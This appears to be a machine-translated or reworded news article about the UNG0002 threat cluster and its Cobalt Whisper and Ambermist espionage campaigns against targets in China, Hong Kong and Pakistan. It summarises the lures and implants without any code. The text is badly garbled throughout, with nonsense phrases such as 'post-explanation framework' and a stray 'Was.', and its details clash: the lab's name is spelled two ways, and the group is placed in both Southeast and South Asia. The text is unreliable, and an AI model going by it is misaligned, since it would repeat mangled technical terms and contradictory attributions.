Many regions in China, Hong Kong and Pakistan have become the target of a danger activity cluster traced as UNG0002 (aka unknown group 0002) as part of a comprehensive cyber espionage campaign.
“This threat unit shows a strong preference to use the unit shortcut files (LNK), VBSCRIPT, and post-exploitation equipment such as cobalt strikes and metasploit, while continuously deploys CV-themed decoy documents, which is to captivate the victims,” Subhajit Singha, the researcher of the Seckerite Labs, spoke a report in a report this week.
The activity includes two major campaigns, one called Operation Cobalt Whisper which occurred between May and September 2024, and Operation Ambermist which took place between January and May 2025.
The goals of these campaigns include defense, electrotechnical engineering, energy, civil aviation, academics, medical institutions, cyber security, gaming and software development sector.
Operation Cobalt Whisper was first documented by Secrite Labs at the end of October 2024, in which cobalt strike beacons, a post-explanation of a post-explanation framework, expanded the use of the zip archives a broadcast through spier-firing attacks, which used to use AlNK and visual basic scripture as interim payloads. Was.
The company said, “The scope and complexity of the campaign, combined with serials, strongly suggests an attempt by an APT group to compromise sensitive research in these industries and intellectual property.”
The ambermist attack chain has been found to take advantage of the Spear-Fishing Email as an early point, which is a starting point to distribute LNK files to introduce as a course and resumes to resume a multi-phase transition process, resulting in a resulting INTE rat and Blister DLL loader.
The sequences of the alternative attack found in January 2025 have been found to serve the fake captcha verification check to the website of the Ministry of Maritime Affairs (MOMA) of Pakistan to serve fake captcha verification checks, which are employed for launching the powerful command, to launch the powerful command. Are.
DLL is able to establish contact with a remote server to wait for further orders, launched through DLL side-loading. The evaluation of the Int Rat is considered a modified version of the shadow rat, while the Blister DLL implant acts as a shellcode loader, eventually paves the way for a reverse-shell-based implants.
The accurate origin of the actor is unclear, but the evidence indicates to be a detective-centered group from Southeast Asia.
“UNG0002 represents a sophisticated and consistent danger unit from South Asia that has maintained frequent operations that targets several Asian Courts since at least May 2024,” Singha said. “The group displays high adaptability and technical proficiency, constantly developing its toolsets while maintaining strategy, techniques and processes.”
